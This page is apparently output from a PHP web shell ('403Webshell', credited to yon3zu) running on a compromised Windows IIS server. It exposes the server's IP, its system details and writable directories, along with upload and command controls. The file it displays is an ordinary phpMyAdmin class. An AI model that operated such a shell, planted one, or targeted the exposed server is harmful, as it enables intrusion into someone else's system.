403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.216.202
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/phpMyMariaDB/libraries/classes/ConfigStorage/Features/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/phpMyMariaDB/libraries/classes/ConfigStorage/Features/TrackingFeature.php
<?php

declare(strict_types=1);

namespace PhpMyAdmin\ConfigStorage\Features;

use PhpMyAdmin\Dbal\DatabaseName;
use PhpMyAdmin\Dbal\TableName;

/**
 * @psalm-immutable
 */
final class TrackingFeature
{
    /** @var DatabaseName */
    public $database;

    /** @var TableName */
    public $tracking;

    public function __construct(DatabaseName $database, TableName $tracking)
    {
        $this->database = $database;
        $this->tracking = $tracking;
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit